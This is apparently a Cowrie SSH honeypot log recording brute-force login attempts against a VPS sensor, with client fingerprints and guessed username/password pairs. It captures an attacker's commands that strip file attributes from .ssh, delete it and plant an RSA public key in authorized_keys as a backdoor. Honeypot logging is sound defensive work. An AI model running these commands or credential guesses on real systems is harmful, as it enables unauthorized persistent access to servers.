{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:51:30.747113Z","src_ip":"212.227.235.229","session":"c428c84f7acc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:51:30.747908Z","src_ip":"212.227.235.229","session":"c428c84f7acc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:51:30.749211Z","src_ip":"212.227.235.229","session":"c428c84f7acc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38662,"dst_ip":"1.2.3.4","dst_port":22,"session":"040c25075847","protocol":"ssh","message":"New connection: 212.227.125.160:38662 (1.2.3.4:22) [session: 040c25075847]","sensor":"my-vps","timestamp":"2025-08-31T00:51:30.912618Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:51:30.995567Z","src_ip":"212.227.235.229","session":"c428c84f7acc"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:51:31.134899Z","src_ip":"212.227.125.160","session":"040c25075847"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:51:31.542893Z","src_ip":"212.227.235.229","session":"c428c84f7acc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T00:51:31.543565Z","src_ip":"212.227.235.229","session":"c428c84f7acc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T00:51:31.784458Z","src_ip":"212.227.235.229","session":"c428c84f7acc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:51:31.785390Z","src_ip":"212.227.235.229","session":"c428c84f7acc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49936,"dst_ip":"1.2.3.4","dst_port":22,"session":"74f3afa81755","protocol":"ssh","message":"New connection: 212.227.235.229:49936 (1.2.3.4:22) [session: 74f3afa81755]","sensor":"my-vps","timestamp":"2025-08-31T00:51:32.020126Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:51:32.020873Z","src_ip":"212.227.235.229","session":"74f3afa81755"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:51:32.258778Z","src_ip":"212.227.235.229","session":"74f3afa81755"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:51:32.408058Z","src_ip":"212.227.125.160","session":"040c25075847"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T00:51:33.259634Z","src_ip":"212.227.235.229","session":"74f3afa81755"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"P@ssw0rd123","message":"login attempt [daemon/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:51:33.531792Z","src_ip":"212.227.125.160","session":"040c25075847"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:51:34.505546Z","src_ip":"212.227.235.229","session":"74f3afa81755"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51212,"dst_ip":"1.2.3.4","dst_port":22,"session":"3763489e412f","protocol":"ssh","message":"New connection: 212.227.235.229:51212 (1.2.3.4:22) [session: 3763489e412f]","sensor":"my-vps","timestamp":"2025-08-31T00:51:34.732909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:51:34.741010Z","src_ip":"212.227.235.229","session":"3763489e412f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:51:34.973259Z","src_ip":"212.227.235.229","session":"3763489e412f"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:51:35.097620Z","src_ip":"212.227.125.160","session":"040c25075847"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:51:35.921376Z","src_ip":"212.227.235.229","session":"3763489e412f"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:51:36.164612Z","src_ip":"212.227.235.229","session":"3763489e412f"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:51:36.169668Z","src_ip":"212.227.235.229","session":"c428c84f7acc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56894,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c7b5e3c84e0","protocol":"ssh","message":"New connection: 212.227.125.160:56894 (1.2.3.4:22) [session: 1c7b5e3c84e0]","sensor":"my-vps","timestamp":"2025-08-31T00:51:38.870795Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:51:38.871450Z","src_ip":"212.227.125.160","session":"1c7b5e3c84e0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:51:38.946019Z","src_ip":"212.227.125.160","session":"1c7b5e3c84e0"}
{"eventid":"cowrie.login.failed","username":"user","password":"1","message":"login attempt [user/1] failed","sensor":"my-vps","timestamp":"2025-08-31T00:51:39.170493Z","src_ip":"212.227.125.160","session":"1c7b5e3c84e0"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:51:40.331920Z","src_ip":"212.227.125.160","session":"1c7b5e3c84e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60438,"dst_ip":"1.2.3.4","dst_port":22,"session":"f48bc4883bfc","protocol":"ssh","message":"New connection: 212.227.125.160:60438 (1.2.3.4:22) [session: f48bc4883bfc]","sensor":"my-vps","timestamp":"2025-08-31T00:51:49.262731Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:51:49.264434Z","src_ip":"212.227.125.160","session":"f48bc4883bfc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:51:49.337724Z","src_ip":"212.227.125.160","session":"f48bc4883bfc"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic","message":"login attempt [elastic/elastic] failed","sensor":"my-vps","timestamp":"2025-08-31T00:51:49.560458Z","src_ip":"212.227.125.160","session":"f48bc4883bfc"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:51:50.642780Z","src_ip":"212.227.125.160","session":"f48bc4883bfc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38012,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e9a6d13bf22","protocol":"ssh","message":"New connection: 212.227.125.160:38012 (1.2.3.4:22) [session: 9e9a6d13bf22]","sensor":"my-vps","timestamp":"2025-08-31T00:51:59.644207Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:51:59.652502Z","src_ip":"212.227.125.160","session":"9e9a6d13bf22"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:51:59.719442Z","src_ip":"212.227.125.160","session":"9e9a6d13bf22"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password","message":"login attempt [oracle/password] failed","sensor":"my-vps","timestamp":"2025-08-31T00:52:00.117452Z","src_ip":"212.227.125.160","session":"9e9a6d13bf22"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:52:01.243234Z","src_ip":"212.227.125.160","session":"9e9a6d13bf22"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40196,"dst_ip":"1.2.3.4","dst_port":22,"session":"075558e395bd","protocol":"ssh","message":"New connection: 212.227.125.160:40196 (1.2.3.4:22) [session: 075558e395bd]","sensor":"my-vps","timestamp":"2025-08-31T00:52:10.118756Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:52:10.119801Z","src_ip":"212.227.125.160","session":"075558e395bd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:52:10.193513Z","src_ip":"212.227.125.160","session":"075558e395bd"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres123","message":"login attempt [postgres/postgres123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:52:10.508709Z","src_ip":"212.227.125.160","session":"075558e395bd"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:52:11.656558Z","src_ip":"212.227.125.160","session":"075558e395bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58922,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad2e3e2c3f20","protocol":"ssh","message":"New connection: 212.227.235.229:58922 (1.2.3.4:22) [session: ad2e3e2c3f20]","sensor":"my-vps","timestamp":"2025-08-31T00:52:12.207174Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:52:12.751969Z","src_ip":"212.227.235.229","session":"ad2e3e2c3f20"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:52:12.752942Z","src_ip":"212.227.235.229","session":"ad2e3e2c3f20"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"letmein","message":"login attempt [daemon/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T00:52:14.909531Z","src_ip":"212.227.235.229","session":"ad2e3e2c3f20"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:52:17.149780Z","src_ip":"212.227.235.229","session":"ad2e3e2c3f20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41722,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a494d195eff","protocol":"ssh","message":"New connection: 212.227.125.160:41722 (1.2.3.4:22) [session: 1a494d195eff]","sensor":"my-vps","timestamp":"2025-08-31T00:52:20.532074Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:52:20.532972Z","src_ip":"212.227.125.160","session":"1a494d195eff"}
